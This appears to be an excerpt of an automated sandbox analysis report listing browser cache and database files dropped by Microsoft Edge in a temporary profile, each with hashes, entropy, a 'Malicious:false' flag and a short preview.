                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:level=none expiry=0.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\1d0e1950-c91c-4fdd-afd6-8af39cfd64c4.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Cache\Cache_Data\data_0

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):45056
                                                                                                                                                              Entropy (8bit):0.012699554836657426
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFlYhEtlGJllXEagKlErKlnl//1g6q/l:/FiEXGll5ln/O
                                                                                                                                                              MD5:AB91D3B7BD95B6696992F6EAEB807D47
                                                                                                                                                              SHA1:B2043CEFBEF3539C2FA046BFF4EA36A9D6A56AAA
                                                                                                                                                              SHA-256:496235D6701BD37CD70AC93BD5C9292C4C2060F722C65502FB9FB687BED47ECF
                                                                                                                                                              SHA-512:B9443D2B5153A491D873A18586AA1E78EFCCAC9BE0F019160D4A3C01282201529F9CD4EEA0463D2956493620DB1AF8C5D5927BA954F4259785E6FC9FE51AAA2D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Cache\Cache_Data\data_1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):270336
                                                                                                                                                              Entropy (8bit):0.028947412170811843
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:U/BEbtMFwGzwcdCIRrYfhbtZPC93OHjsqJm09MWPG:qUtMFwGzTd/Rc1PCQHjTpM
                                                                                                                                                              MD5:1266DCB65D6BDA2AAD513390AA95CA09
                                                                                                                                                              SHA1:F5884EFA6A3527D1513F3C6BEBB1758EC9F72C80
                                                                                                                                                              SHA-256:AA320E1E76EF58E00943718AB13471F387D24AC1A48673F0FE976407455EE96A
                                                                                                                                                              SHA-512:72F189FD6A6E2F414B5A041E1E9F9684BAFC8476B0EC373EA4EC5E5C89A12DA26937FA5945E835793CB9F732B0EE50E9E5D0D9460E846D7C3E13F3BD1FEE7D48
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:................................................................................s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Cache\Cache_Data\data_2

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Cache\Cache_Data\data_3

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Cache\Cache_Data\index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):524656
                                                                                                                                                              Entropy (8bit):5.027445846313988E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Lsuldj//:LswX
                                                                                                                                                              MD5:E26E6BE7D8C8B23CE4203F25D79433A8
                                                                                                                                                              SHA1:9DC2B2751CD7A5D8F8C633A1AB2216852925E707
                                                                                                                                                              SHA-256:06DB5E5A496EB20ADFC147042A98134E56DB48C0B80929E4C9A749C35169CAB8
                                                                                                                                                              SHA-512:BF841F7E89561C94A1428E210C3524D70D746865FBF49096E04553990A4613260928CBE1D30F6D2D3BB290A3AFEFDE7F96A3AFE25EE175865DBC65BCBFBFC9FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................v...../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Code Cache\js\index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24
                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0\r..m..................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48
                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:pfdSyEfKj6n:2fKj6
                                                                                                                                                              MD5:F7F504BC76D7F404570E8E7EF1D7CF51
                                                                                                                                                              SHA1:22E9973F3F4012E084D6A0985A518A6DF8E88650
                                                                                                                                                              SHA-256:DC14EC6513A853EEA891CCDDE2EEB1FDB0B578DB281383B6CD25CFD1E2505872
                                                                                                                                                              SHA-512:5876BF590AB57A7D7227E70C6ACAF91DEB4C0B4A11DD04F91AFAE86BD378F33AED9514A02128F6E34FF3C683A05322AD986302167FF76D0B22AB2B246A3AF7A0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:(...4zL.oy retne............................./.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48
                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:pfdSyEfKj6n:2fKj6
                                                                                                                                                              MD5:F7F504BC76D7F404570E8E7EF1D7CF51
                                                                                                                                                              SHA1:22E9973F3F4012E084D6A0985A518A6DF8E88650
                                                                                                                                                              SHA-256:DC14EC6513A853EEA891CCDDE2EEB1FDB0B578DB281383B6CD25CFD1E2505872
                                                                                                                                                              SHA-512:5876BF590AB57A7D7227E70C6ACAF91DEB4C0B4A11DD04F91AFAE86BD378F33AED9514A02128F6E34FF3C683A05322AD986302167FF76D0B22AB2B246A3AF7A0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:(...4zL.oy retne............................./.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Code Cache\wasm\index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24
                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0\r..m..................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Code Cache\wasm\index-dir\temp-index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48
                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Y+lXAyEO8G:YOQ9tG
                                                                                                                                                              MD5:11AA5D04A8BF797CF732B80DD888D137
                                                                                                                                                              SHA1:D452A548D92DAEA8E15133D33AAE4D10D39EAEA0
                                                                                                                                                              SHA-256:88ED9F254AD70B720116BEE6C28883BA6C04B42AB078F45C371D9393A068260F
                                                                                                                                                              SHA-512:5B3CA85B36E40E2750D0A6401DF58A70A1A8BA5CE076144F58FCA5EB68C9C6D875E3CDBE1C27C0AA7B855887753A0CEB1C1387DD95EDDC3DB2AA5DD430C627E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:(....[..oy retne............................../.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48
                                                                                                                                                              Entropy (8bit):2.9972243200613975
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Y+lXAyEO8G:YOQ9tG
                                                                                                                                                              MD5:11AA5D04A8BF797CF732B80DD888D137
                                                                                                                                                              SHA1:D452A548D92DAEA8E15133D33AAE4D10D39EAEA0
                                                                                                                                                              SHA-256:88ED9F254AD70B720116BEE6C28883BA6C04B42AB078F45C371D9393A068260F
                                                                                                                                                              SHA-512:5B3CA85B36E40E2750D0A6401DF58A70A1A8BA5CE076144F58FCA5EB68C9C6D875E3CDBE1C27C0AA7B855887753A0CEB1C1387DD95EDDC3DB2AA5DD430C627E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:(....[..oy retne............................../.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\DawnCache\data_0

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\DawnCache\data_1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):270336
                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\DawnCache\data_2

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\DawnCache\data_3

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\DawnCache\index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):262512
                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:LsNlDRG//:Ls3Nm
                                                                                                                                                              MD5:B948FAA26724507AB3B80B88081C082A
                                                                                                                                                              SHA1:CD258E7331F32E5AA7C46214F261DDCEF4444380
                                                                                                                                                              SHA-256:2804935E771F9A47DDDCD0C6A7735BC933639C5D42273DA6BD88CB74C8413A1C
                                                                                                                                                              SHA-512:C7B73FC4DA10595F47AEE39221B1660CE897F5E9829204AA7FC488F73A727956CDAA2BAEAD641C9705B49AA54F9ED3CB6CFBF192B6C307A192E19BF5075369C5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):33
                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):285
                                                                                                                                                              Entropy (8bit):5.272113637469218
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFS/lB1qLTwi23fQr//G2tbB2KLlVEFSyNFN+q2PqLTwi23fQr//G2tMsIFUv:ko/WwZCn9VFLsoyNOv8wZCn9GFUv
                                                                                                                                                              MD5:EBFF4D683DE99C2E013E4C4DFA855C8C
                                                                                                                                                              SHA1:EB330CB118496E821E2129F41592BCCFCF74DE6D
                                                                                                                                                              SHA-256:2473256D294FF22356E457AD9F8D5FC21ED14FBB4E724D0132769255D64ABBD5
                                                                                                                                                              SHA-512:3A4AEE393A4647BD6BEFF846FAE2DCC96A1923B4906B2B5DF65057839DD7203FC1E99421ABA5F54425C29E0BB4E0A883314B574E36360AF4E3C067955E56D5E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.041 1928 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/11/21-05:27:21.150 1928 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):171
                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Extension Rules\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):259
                                                                                                                                                              Entropy (8bit):5.241327403303907
                                                                                                                                                              Encrypted:false
